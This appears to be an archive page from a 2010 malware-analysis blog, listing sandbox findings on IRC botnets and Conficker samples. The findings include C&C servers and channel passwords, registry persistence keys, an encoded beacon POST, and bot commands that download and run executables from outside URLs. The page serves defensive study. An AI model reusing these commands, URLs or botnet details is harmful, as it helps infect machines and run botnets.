Month: November 2010

Remote Host Port Number 178.211.53.6 9595 PASS prison 72.233.89.199 80 91.198.22.71 80 PONG leaf.35204.com NICK {iNF-00-USA-XP-COMP-6996} USER MEAT * 0 :COMP JOIN ###mini NICK {00-USA-XP-COMP-5663} Now talking in ###mini Topic On: [ ###mini ] [ .banner ] Topic By: [ pe[ro ] Modes On: [ ###mini ] [ +smntu ] Other details * The followingRead more...

reportaboutbosn.com 91.217.162.174 UDP Connections Remote IP Address: 127.0.0.1 Port: 1043 Send Datagram: 2 packet(s) of size 1 Recv Datagram: 2 packet(s) of size 1 Download URLs http://91.217.162.174/inst.php?id=abs_01 (reportaboutbosn.com) Outgoing connection to remote server: reportaboutbosn.com TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = C:Dokumente und EinstellungenAdministratorAnwendungsdatenhotfix.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsRead more...

Remote Host Port Number 129.7.211.61 7537 Resolved : [xdrone.sytes.net] To [129.7.211.61] NICK carnern SILENCE +*!*@*,~*!*@*undernet.org,~*!*@*.ro MODE hanglyb +iwx NICK harbaughz USER havoc “” “xdrone.sytes.net” :Who’s Peer & why did he reset my connection? MODE #drone NICK :disneyv MODE harbaughz +i USER bowker “” “xdrone.sytes.net” :Press any key to continue or any other key to quit…Read more...

Remote Host Port Number 124.217.229.162 83 PASS letmein NICK [00-USA-XP-3036431] USER SP2-ilm * 0 :COMPUTERNAME Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimalWM System Decode Application o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootNetworkWM System Decode Application o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SYSDRV32 o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SYSDRV32000 o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SYSDRV32000Control o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_WM_SYSTEM_DECODE_APPLICATION o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_WM_SYSTEM_DECODE_APPLICATION000 o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_WM_SYSTEM_DECODE_APPLICATION000Control o HKEY_LOCAL_MACHINESYSTEMControlSet001Servicessysdrv32 o HKEY_LOCAL_MACHINESYSTEMControlSet001Servicessysdrv32Security o HKEY_LOCAL_MACHINESYSTEMControlSet001Servicessysdrv32Enum o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWM SystemRead more...

Remote Host Port Number 125.17.135.163 6667 PASS blah NICK fawrqd USER pscebs “” “btj” :pscebs PONG :EF4570FF JOIN #cC-Team x0r PONG :irc.flaw.net Invisible Users: 786 Channels: 14 channels formed Clients: I have 810 clients and 0 servers Local users: Current Local Users: 810 Max: 1185 Global users: Current Global Users: 810 Max: 1052 Registry ModificationsRead more...

3 domains found from this malware and multiple tasks are called from same exe file exe is uploaded by mysterii DNS: verseuable.com: type A, class IN, addr 64.191.16.70 twindu.net: type A, class IN, addr 77.120.109.3 cogiicio.com: type A, class IN, addr 87.255.51.229 HTTP: Data: POST /bu​gatti.ph​p?ini=v2​2Mm2fmTo​X7DzVq7F​BHROc/PO​W6dtZpa4​xZTXQhKB​9UBFbWih​Pdnz2vDF​rHIQqMgM​qV7MpGeg​iBMF4YGm​LzfIyRtu​fQpaX/NP​tque7okw​== HTTP/​1.1 RAW: ..’.?…​’..K..E.​.-.R@…​^…o.@.​.F.O.PQ.​.2….P.​……PO​ST /buga​tti.php?​ini=v22M​m2fmToX7​DzVq7FBH​ROc/POW6​dtZpa4xZ​TXQhKB9U​BFbWihPd​nz2vDFrH​IQqMgMqV​7MpGegiB​MF4YGmLz​fIyRtufQ​paX/NPtq​ue7okw==​ HTTP/1.​1..Conte​nt-Type:​applicat​ion/x-ww​w-form-u​rlencode​d..Host:​ verseua​ble.com.​.User-Ag​ent: Moz​illa/6.0​ (Window​s; wget3​.0)..Con​tent-Len​gth:Read more...

Remote Host Port Number 70.38.98.239 80 92.243.24.240 5900 PASS Virus NICK VirUs-sgvyxgjf USER VirUs “” “dah” : 8Coded 8VirUs.. JOIN #THeRaNdOm4# Virus PRIVMSG #THeRaNdOm4# :Success. PONG :OGARD.EDUCATIONAL.Gov Now talking in #THeRaNdOm4# Topic On: [ #THeRaNdOm4# 12] [ !NAZELlol http://img105.herosh.com/2010/11/11/555028723.gif Hajni12.exe 1 ] Topic By: [ Somebody ] tux.shannen.cc 92.243.24.240 0 127.0.0.1 fastwebinfo.com fastwebinfo.com 66.96.217.24 promoup.infoRead more...

nice.niceshot.in 67.202.108.14 C&C Server: 67.202.108.14:6567 Server Password: Username: XP-5109 Nickname: [SI|DEU|00|P|07356] Channel: #update# (Password: c1rc0dus0leil) Channeltopic: :.updbin http://www.ahava.lt/ali.exe Username: XP-1820 Nickname: [SI|DEU|00|P|47468] Channel: #cricri# (Password: c1rc0dus0leil) Channeltopic: nice.niceshot.in 67.202.108.130 C&C Server: 67.202.108.130:6567 Server Password: Username: XP-3473 Nickname: [SI|DEU|00|P|06553] Channel: #csm# (Password: c1rc0dus0leil) Channeltopic: :.austinupdate http://www.minka.com.pe/wp-includes/js/crap.exe MODE [SI|USA|00|P|82252] -ix JOIN #perurlz# c1rc0dus0leil PRIVMSG #perurlz# :[Dl]: FileRead more...

tep.xylocomod.com 66.96.240.101 Remote Host Port Number 66.96.240.101 9009 NICK n{USA|XP}430851 USER 4308 “” “TsGh” :4308 JOIN ##kuwait## 112211 PRIVMSG ##kuwait## :New Infection! Ganja 2.2 Executed! Now talking in ##kuwait## Topic On: [ ##kuwait## ] [ !dl http://fagermoshreq.100free.com/win win.exe 1 | !av.kill | !clean ] Topic By: [ X ] Other details * The following portRead more...

package contains 20 mb executable files from diferent versions of conficker litle informacion about conficker variants: C:Documents and SettingsAdministratorMy DocumentsDownloadslast122830b424d88664cc3576941dd9841f9 – Win32/Conficker.AA worm C:Documents and SettingsAdministratorMy DocumentsDownloadslast124199a5b981fd5a3d846d3f9d4c1d574 – Win32/Conficker.AA worm C:Documents and SettingsAdministratorMy DocumentsDownloadslast1260722ac0e512e73f6c16ebe87229bea – a variant of Win32/Conficker.X worm C:Documents and SettingsAdministratorMy DocumentsDownloadslast12656e272e85a25caaece4591e24b4d35 – a variant of Win32/Conficker.X worm C:Documents and SettingsAdministratorMy DocumentsDownloadslast12724c68f973e4e35391849cfb5259f86 –Read more...